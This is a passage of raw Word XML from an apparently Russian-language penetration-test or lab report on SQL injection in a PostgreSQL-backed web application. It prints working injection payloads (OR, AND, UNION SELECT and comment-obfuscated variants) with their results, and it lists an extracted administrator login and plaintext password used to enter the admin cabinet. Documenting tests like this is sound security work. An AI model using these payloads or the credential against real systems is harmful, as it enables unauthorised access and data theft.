        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3650" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1DEDBC0B" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>max_connections</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6236" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4453B67B" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>100</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00223005" w14:paraId="34710E3F" w14:textId="77777777" w:rsidTr="00223005">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3650" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5762B30F" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>pg_stat_activity</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>count</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6236" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="007C1CFF" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>26</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="703C55C9" w14:textId="77777777" w:rsidR="00223005" w:rsidRDefault="00223005" w:rsidP="00223005"/>
    <w:p w14:paraId="55B3EFA0" w14:textId="77777777" w:rsidR="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Через таблицу </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> был получен список учетных записей приложения. Среди них была найдена учетная запись с ролью </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>. После этого была выполнена штатная авторизация под найденным пользователем, и приложение открыло личный кабинет администратора.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FCA90F" w14:textId="77777777" w:rsidR="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
      <w:pPr>
        <w:pStyle w:val="af5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0234B699" wp14:editId="3B4DB03A">
            <wp:extent cx="5832000" cy="16263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1_.jpg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5832000" cy="1626304"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="61EE9FC8" w14:textId="77777777" w:rsidR="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:t>Рисунок 11 – Извлечение учетной записи администратора</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7494E6" w14:textId="77777777" w:rsidR="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
      <w:pPr>
        <w:pStyle w:val="ab"/>
      </w:pPr>
      <w:r w:rsidRPr="00223005">
        <w:t>Таблица 15 – Найденная учетная запись администратора</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af4"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3650"/>
        <w:gridCol w:w="6236"/>
      </w:tblGrid>
      <w:tr w:rsidR="00223005" w14:paraId="0089DD76" w14:textId="77777777" w:rsidTr="00223005">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3650" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0580FBD9" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Параметр</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6236" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="404A6177" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Значение</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00223005" w14:paraId="0101DBE1" w14:textId="77777777" w:rsidTr="00223005">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3650" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4401B96E" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>login</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6236" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="11338855" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>everybody_use@rambler.ru</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00223005" w14:paraId="7E41525E" w14:textId="77777777" w:rsidTr="00223005">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3650" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3F5D06A7" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>password</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6236" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6ED50C2F" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>(WUM70hl*5gaAQfg</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00223005" w14:paraId="41802F49" w14:textId="77777777" w:rsidTr="00223005">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3650" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2B01E48C" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>role</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6236" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="02A9A734" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>admin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6DA2E29A" w14:textId="77777777" w:rsidR="00223005" w:rsidRDefault="00223005" w:rsidP="00223005"/>
    <w:p w14:paraId="1CDC320C" w14:textId="77777777" w:rsidR="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
      <w:pPr>
        <w:pStyle w:val="af5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E6E64BA" wp14:editId="5C1B0697">
            <wp:extent cx="5832000" cy="2548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2_.jpg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5832000" cy="2548927"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4678B2D4" w14:textId="130A7994" w:rsidR="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:t>Рисунок 12 – Личный кабинет после входа под найденным администратором</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E6CF33" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005"/>
    <w:p w14:paraId="1903990A" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:rPr>
          <w:rStyle w:val="23"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00223005">
        <w:t xml:space="preserve">Извлечение структуры БД, флагов и сведений о </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00223005">
        <w:t>PostgreSQL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="35B9CB3C" w14:textId="77777777" w:rsidR="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Помимо ручки /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>login</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> были проверены другие параметры приложения. Это было сделано для подтверждения того, что проблема не ограничивается одной формой авторизации, а связана с общим небезопасным подходом к построению SQL-запросов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B68DA5" w14:textId="77777777" w:rsidR="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
      <w:pPr>
        <w:pStyle w:val="ab"/>
      </w:pPr>
      <w:r>
        <w:t>Таблица 16 – Дополнительные проверенные векторы</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af4"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3134"/>
        <w:gridCol w:w="3685"/>
        <w:gridCol w:w="3061"/>
      </w:tblGrid>
      <w:tr w:rsidR="00223005" w14:paraId="217ECA5E" w14:textId="77777777" w:rsidTr="00223005">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2665" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7D64CC67" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Вектор</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3685" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1F0286FA" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Payload</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve"> / проверка</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3061" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3F00EC87" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Результат</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00223005" w14:paraId="7B7E941A" w14:textId="77777777" w:rsidTr="00603F8B">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2665" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="18262B07"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0B4D6BD6" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>x' OR '1'='1'--</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3061" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="342E9E60" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>возвращен список товаров</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00223005" w14:paraId="2251240A" w14:textId="77777777" w:rsidTr="00603F8B">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2665" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4204915F"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4449C0F4" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>x' AND '1'='2'--</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3061" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5C7C2981" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>возвращен пустой массив []</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00223005" w14:paraId="18EA3718" w14:textId="77777777" w:rsidTr="00603F8B">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2665" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1DE055DF"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424B155E" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>x' UNION SELECT 1,'cat','desc','name',1.00,</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>1,true</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>--</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3061" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="557F8A51" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>в JSON-ответ внедрена искусственная строка товара</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00223005" w14:paraId="505A986D" w14:textId="77777777" w:rsidTr="00603F8B">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2665" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6C505C3F"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/profile, Authorization Bearer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3685" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="61EFD67E" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>x'/**/OR/**/'1'='1'--</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3061" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4904987C" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>возвращен профиль другого пользователя</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00223005" w14:paraId="4A1984CE" w14:textId="77777777" w:rsidTr="00603F8B">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2665" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3E965D19"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w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>/{</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>article</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3685" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="297E5735" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>3294072781203 OR 1=1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3061" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6EE45EE6" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>SQLi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> не подтверждена, получен 404 на уровне маршрутизации</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5008B85D" w14:textId="77777777" w:rsidR="00223005" w:rsidRDefault="00223005" w:rsidP="00223005"/>
    <w:p w14:paraId="7995A657" w14:textId="77777777" w:rsidR="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
      <w:pPr>
        <w:pStyle w:val="af5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41C45992" wp14:editId="24AD0889">
            <wp:extent cx="5832000" cy="3007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3_Boolean_based_SQLi_category_.jpg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5832000" cy="3007722"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1B60A5" w14:textId="77777777" w:rsidR="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок 13 – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Boolean-based</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SQLi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
